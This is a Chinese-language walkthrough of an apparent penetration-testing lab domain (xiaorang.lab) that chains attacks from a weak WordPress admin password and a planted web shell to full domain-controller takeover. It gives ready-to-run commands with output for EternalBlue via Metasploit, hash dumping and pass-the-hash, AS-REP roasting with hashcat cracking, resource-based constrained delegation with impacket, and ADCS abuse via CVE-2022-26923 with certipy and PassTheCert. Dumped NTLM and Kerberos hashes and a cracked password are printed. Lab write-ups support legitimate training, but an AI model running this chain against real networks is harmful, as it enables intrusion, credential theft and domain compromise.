首先先用fscan扫一下内容
D:\ONE-FOX集成工具箱_V8.2公开版_by狐狸\gui_scan\fscan>fscan.exe -h 39.99.229.232
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-04-15 20:44:35] [INFO] 暴力破解线程数: 1
[2025-04-15 20:44:35] [INFO] 开始信息扫描
[2025-04-15 20:44:35] [INFO] 最终有效主机数量: 1
[2025-04-15 20:44:35] [INFO] 开始主机扫描
[2025-04-15 20:44:35] [INFO] 有效端口数量: 233
[2025-04-15 20:44:35] [SUCCESS] 端口开放 39.99.229.232:22
[2025-04-15 20:44:35] [SUCCESS] 端口开放 39.99.229.232:80
[2025-04-15 20:44:35] [SUCCESS] 服务识别 39.99.229.232:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-15 20:44:40] [SUCCESS] 服务识别 39.99.229.232:80 => [http]
[2025-04-15 20:44:45] [INFO] 存活端口数量: 2
[2025-04-15 20:44:45] [INFO] 开始漏洞扫描
[2025-04-15 20:44:45] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-04-15 20:44:45] [SUCCESS] 网站标题 http://39.99.229.232 状态码:200 长度:39988 标题:XIAORANG.LAB
[2025-04-15 20:45:02] [SUCCESS] 扫描已完成: 3/3
没有什么内容,dir扫一下内容
[20:45:31] Starting:
[20:45:36] 403 - 278B - /.ht_wsr.txt
[20:45:36] 403 - 278B - /.htaccess.save
[20:45:36] 403 - 278B - /.htaccessBAK
[20:45:36] 403 - 278B - /.htaccess.orig
[20:45:36] 403 - 278B - /.html
[20:45:36] 403 - 278B - /.htaccess_extra
[20:45:36] 403 - 278B - /.htm
[20:45:36] 403 - 278B - /.htaccess.bak1
[20:45:36] 403 - 278B - /.htaccessOLD2
[20:45:36] 403 - 278B - /.htaccessOLD
[20:45:36] 403 - 278B - /.htaccess.sample
[20:45:36] 403 - 278B - /.htaccess_orig
[20:45:36] 403 - 278B - /.htaccess_sc
[20:45:36] 403 - 278B - /.htpasswd_test
[20:45:36] 403 - 278B - /.htpasswds
[20:45:36] 403 - 278B - /.httr-oauth
[20:45:37] 403 - 278B - /.php
[20:45:59] 301 - 0B - /index.php -> http://39.99.229.232/
[20:46:00] 404 - 35KB - /index.php/login/
[20:46:01] 200 - 7KB - /license.txt
[20:46:08] 200 - 3KB - /readme.html
[20:46:09] 403 - 278B - /server-status
[20:46:09] 403 - 278B - /server-status/
[20:46:18] 301 - 317B - /wp-admin -> http://39.99.229.232/wp-admin/
[20:46:18] 200 - 513B - /wp-admin/install.php
[20:46:18] 409 - 3KB - /wp-admin/setup-config.php
[20:46:18] 400 - 1B - /wp-admin/admin-ajax.php
[20:46:18] 302 - 0B - /wp-admin/ -> http://39.99.229.232/wp-login.php?redirect_to=http%3A%2F%2F39.99.229.232%2Fwp-admin%2F&reauth=1
[20:46:18] 200 - 0B - /wp-config.php
[20:46:18] 200 - 0B - /wp-content/
[20:46:18] 301 - 319B - /wp-content -> http://39.99.229.232/wp-content/
[20:46:18] 200 - 477B - /wp-content/uploads/
[20:46:18] 200 - 416B - /wp-content/upgrade/
[20:46:18] 200 - 84B - /wp-content/plugins/akismet/akismet.php
[20:46:18] 500 - 0B - /wp-content/plugins/hello.php
[20:46:18] 200 - 0B - /wp-includes/rss-functions.php
[20:46:18] 301 - 320B - /wp-includes -> http://39.99.229.232/wp-includes/
[20:46:18] 200 - 2KB - /wp-login.php
[20:46:18] 200 - 0B - /wp-cron.php
[20:46:18] 200 - 5KB - /wp-includes/
[20:46:18] 302 - 0B - /wp-signup.php -> http://39.99.229.232/wp-login.php?action=register
[20:46:18] 405 - 42B - /xmlrpc.php
很明显是可以看出是wordpress
flag1
先简单的手测了一下是弱密码,fuzz开爆也是可以的
admin::123456登录,然后就是在editor里面写马
用蚁剑连接木马
http://39.99.159.217//wp-content/themes/twentytwentyone/header.php
先上传fsan扫描一下
[2025-04-15 21:02:45] [SUCCESS] 目标 172.22.15.35 存活 (ICMP)
[2025-04-15 21:02:45] [SUCCESS] 目标 172.22.15.26 存活 (ICMP)
[2025-04-15 21:02:46] [SUCCESS] 目标 172.22.15.13 存活 (ICMP)
[2025-04-15 21:02:46] [SUCCESS] 目标 172.22.15.18 存活 (ICMP)
[2025-04-15 21:02:46] [SUCCESS] 目标 172.22.15.24 存活 (ICMP)
[2025-04-15 21:02:51] [INFO] 存活主机数量: 5
[2025-04-15 21:02:51] [INFO] 有效端口数量: 233
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.26:80
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.26:22
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:80
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:80
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:88
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.35:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.35:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:389
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:445
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.35:445
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:445
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:445
[2025-04-15 21:02:52] [SUCCESS] 服务识别 172.22.15.26:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.26:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:88 =>
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.18:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.18:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.24:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.35:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.24:139 => Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.18:445 =>
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.35:445 =>
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:445 =>
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.24:445 =>
[2025-04-15 21:02:58] [SUCCESS] 端口开放 172.22.15.24:3306
[2025-04-15 21:03:02] [SUCCESS] 服务识别 172.22.15.24:3306 => [mysql] 版本:5.7.26 产品:MySQL Banner:[J.5.7.26.b.H.32...v 2A` 5\@r mysql_native_password]
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.24:135 =>
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.13:135 =>
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.35:135 =>
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.18:135 =>
[2025-04-15 21:03:57] [INFO] 存活端口数量: 19
[2025-04-15 21:03:57] [INFO] 开始漏洞扫描
[2025-04-15 21:03:57] [INFO] 加载的插件: findnet, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.18
主机名: XR-CA
发现的网络接口:
IPv4地址:
└─ 172.22.15.18
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.13
主机名: XR-DC01
发现的网络接口:
IPv4地址:
└─ 172.22.15.13
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.24
主机名: XR-WIN08
发现的网络接口:
IPv4地址:
└─ 172.22.15.24
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.35
主机名: XR-0687
发现的网络接口:
IPv4地址:
└─ 172.22.15.35
[2025-04-15 21:03:57] [INFO] 系统信息 172.22.15.13 [Windows Server 2016 Standard 14393]
[2025-04-15 21:03:57] [SUCCESS] 发现漏洞 172.22.15.24 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
[2025-04-15 21:03:57] [SUCCESS] 网站标题 http://172.22.15.24 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.15.24/www
[2025-04-15 21:03:57] [SUCCESS] 网站标题 http://172.22.15.18 状态码:200 长度:703 标题:IIS Windows Server
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.35 XIAORANG\XR-0687
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.13 DC:XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
[2025-04-15 21:03:57] [SUCCESS] 网站标题 http://172.22.15.26 状态码:200 长度:39962 标题:XIAORANG.LAB
[2025-04-15 21:03:58] [SUCCESS] 目标: http://172.22.15.18:80
漏洞类型: poc-yaml-active-directory-certsrv-detect
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/EasonJim/p/6859345.html
[2025-04-15 21:03:58] [SUCCESS] 网站标题 http://172.22.15.24/www/sys/index.php 状态码:200 长度:135 标题:无标题
[2025-04-15 21:04:22] [SUCCESS] 扫描已完成: 35/35
整理一下信息内容
172.22.15.26 本机已通
172.22.15.13 XR-DC01
172.22.15.18 XR-CA
172.22.15.24 XR-WIN08 MS17-010
172.22.15.35 XR-0687
[2025-04-15 21:03:57] [SUCCESS] 发现漏洞 172.22.15.24 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
需要通个隧道(卡了比较长的时间),这里用老版的frp直接通吧
flag2
打一手永恒之蓝
proxychains4 msfconsole
search MS17-010 blue
use 0
或者直接
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.15.24
run
meterpreter > hashdump
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
这里msf使用比较麻烦应该是因为不是pro导致的问题,直接使用psexec就行,实操过程中psexec的644行需要微调
proxychains4 python3 psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk
flag3
走浏览器代理访问一下网页,也还是弱密码admin:123456
把数据导出出来
导出模板,之后对域用户名进行整理一下
lixiuying@xiaorang.lab
lixiaoliang@xiaorang.lab
zhangyi@xiaorang.lab
jiaxiaoliang@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
wanghao@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab
看了一下是AS-ERP Roasting
proxychains4 impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile username.txt xiaorang.lab/
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] User lihongxia@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] User wangyulan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.22.15.13:88 ... OK
[-] User chenjianhua@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
可以整理出两个信息,两个TGT
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398
hashcat爆破一下
hashcat -m 18200 --force '$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807' /usr/share/wordlists/rockyou.txt
hashcat -m 18200 --force '$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398' /usr/share/wordlists/rockyou.txt
可以跑出这两组数据
跑一下bloodhound
proxychains4 bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp
然后导入到bloodhound看一下内容发现lixiuying对XR-0687具有GenericWrite权限,能打RBCD
proxychains4 impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'HACK$' -computer-pass 'orange@admin'
proxychains4 impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'HACK$'
proxychains4 impacket-getST xiaorang.lab/'HACK$':'orange@admin' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache
proxychains4 impacket-psexec administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13
flag4
接下来打ADCS,这里考察的是CVE-2022-26923
申请证书模版
proxychains4 certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user Test2 -pass Test1234 -dns 'XR-DC01.xiaorang.lab'
proxychains4 certipy-ad req -u Test2\$@xiaorang.lab -p Test1234 -target 172.22.15.18 -ca "xiaorang-XR-CA-CA" -template Machine
PassTheCert/Python at main · AlmondOffSec/PassTheCert后续需要用到这个脚本
利用上面生成的 pfx 证书配置域控的 RBCD 给上面创建的HACK$
certipy-ad cert -pfx xr-dc01.pfx -nokey -out user.crt
certipy-ad cert -pfx xr-dc01.pfx -nocert -out user.key
proxychains4 python passthecert.py -action whoami -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains4 python passthecert.py -action write_rbcd -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'HACK$'
导入票据
proxychains4 impacket-getST xiaorang.lab/HACK\$:orange@admin -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator
└─# export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache
psexec无密码登录
proxychains4 impacket-psexec xiaorang.lab/Administrator@xr-dc01.xiaorang.lab -k -no-pass -target-ip 172.22.15.13 -codec gbk
